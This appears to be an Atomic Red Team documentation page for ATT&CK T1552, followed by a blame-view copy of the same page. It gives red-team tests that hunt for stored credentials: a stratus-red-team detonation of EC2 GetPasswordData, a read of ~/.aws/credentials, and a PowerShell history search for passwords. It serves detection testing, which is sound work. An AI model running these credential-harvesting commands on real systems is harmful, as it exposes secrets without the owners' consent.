atomics/T1552/T1552.md

# T1552 - Unsecured Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1552)
<blockquote>

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Shell History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)),  or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus](#atomic-test-1---aws---retrieve-ec2-password-data-using-stratus)

- [Atomic Test #2 - Search for Passwords in Powershell History](#atomic-test-2---search-for-passwords-in-powershell-history)


<br/>

## Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus
This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/

**Supported Platforms:** Linux, macOS, Iaas:aws


**auto_generated_guid:** a21118de-b11e-4ebd-b655-42f11142df0c


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1552/src|
| aws_region | AWS region to detonate | string | us-west-2|


#### Attack Commands: Run with `sh`! 


```sh
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.credential-access.ec2-get-password-data
echo "starting detonate"
./stratus detonate aws.credential-access.ec2-get-password-data --force
```

#### Cleanup Commands:
```sh
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
```


#### Dependencies:  Run with `sh`!
##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
##### Check Prereq Commands:
```sh
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
```
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
##### Check Prereq Commands:
```sh
cat ~/.aws/credentials | grep "default"
```
##### Get Prereq Commands:
```sh
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
```


<br/>
<br/>

## Atomic Test #2 - Search for Passwords in Powershell History
Find passwords in the powershell history files
Searching for following strings: "password", "-p", "key", "pwd", "pass"

**Supported Platforms:** Windows


**auto_generated_guid:** f9c3d0ab-479b-4019-945f-22ace2b1731a


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Select-String "password", "-p", "key", "pwd", "pass"
```


<br/>
Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00			`# T1552 - Unsecured Credentials`
			`## [Description from ATT&CK](https://attack.mitre.org/techniques/T1552)`
Generated docs from job=generate-docs branch=master [ci skip] 2025-02-13 22:03:40 +00:00			`<blockquote>`

Generated docs from job=generate-docs branch=master [ci skip] 2025-11-05 01:55:34 +00:00			Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Shell History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)
Generated docs from job=generate-docs branch=master [ci skip] 2025-02-13 22:03:40 +00:00
			`</blockquote>`
Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00
			`## Atomic Tests`

			`- [Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus](#atomic-test-1---aws---retrieve-ec2-password-data-using-stratus)`

Generated docs from job=generate-docs branch=master [ci skip] 2024-07-04 17:06:22 +00:00			`- [Atomic Test #2 - Search for Passwords in Powershell History](#atomic-test-2---search-for-passwords-in-powershell-history)`

Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00
			`<br/>`

			`## Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus`
			This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/

Generated docs from job=generate-docs branch=master [ci skip] 2023-07-12 02:56:51 +00:00			`Supported Platforms: Linux, macOS, Iaas:aws`
Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00

			`auto_generated_guid: a21118de-b11e-4ebd-b655-42f11142df0c`





			`#### Inputs:`
			`\| Name \| Description \| Type \| Default Value \|`
			`\|------\|-------------\|------\|---------------\|`
Generated docs from job=generate-docs branch=master [ci skip] 2023-02-13 23:11:19 +00:00			`\| stratus_path \| Path of stratus binary \| path \| $PathToAtomicsFolder/T1552/src\|`
			`\| aws_region \| AWS region to detonate \| string \| us-west-2\|`
Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00

			#### Attack Commands: Run with `sh`!


			```sh
			`export AWS_REGION=#{aws_region}`
			`cd #{stratus_path}`
			`echo "starting warmup"`
			`./stratus warmup aws.credential-access.ec2-get-password-data`
			`echo "starting detonate"`
			`./stratus detonate aws.credential-access.ec2-get-password-data --force`
			```

			`#### Cleanup Commands:`
			```sh
			`export AWS_REGION=#{aws_region}`
			`echo "Cleanup detonation"`
			`cd #{stratus_path}`
			`./stratus cleanup --all`
			`rm -rf stratus*`
			```



			#### Dependencies: Run with `sh`!
			`##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)`
			`##### Check Prereq Commands:`
			```sh
			`if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;`
			```
			`##### Get Prereq Commands:`
			```sh
			`if [ "$(uname)" == "Darwin" ]`
			`then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest \| grep browser_download_url \| grep Darwin_x86_64 \| cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL`
			`tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/`
			`elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]`
Correct the capitalization in file names and remove blank lines 2023-10-16 14:51:44 +08:00			`then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest \| grep browser_download_url \| grep Linux_x86_64 \| cut -d '"' -f 4)`
Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00			`wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL`
			`tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/`
			`fi`
			```
			`##### Description: Check if ~/.aws/credentials file has a default stanza is configured`
			`##### Check Prereq Commands:`
			```sh
			`cat ~/.aws/credentials \| grep "default"`
			```
			`##### Get Prereq Commands:`
			```sh
			`echo Please install the aws-cli and configure your AWS defult profile using: aws configure`
			```




Generated docs from job=generate-docs branch=master [ci skip] 2024-07-04 17:06:22 +00:00			`<br/>`
			`<br/>`

			`## Atomic Test #2 - Search for Passwords in Powershell History`
			`Find passwords in the powershell history files`
			`Searching for following strings: "password", "-p", "key", "pwd", "pass"`

			`Supported Platforms: Windows`


			`auto_generated_guid: f9c3d0ab-479b-4019-945f-22ace2b1731a`






			#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)


			```powershell
			`ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt \| Select-String "password", "-p", "key", "pwd", "pass"`
			```






Generated docs from job=generate-docs branch=master [ci skip] 2022-08-22 15:21:48 +00:00			`<br/>`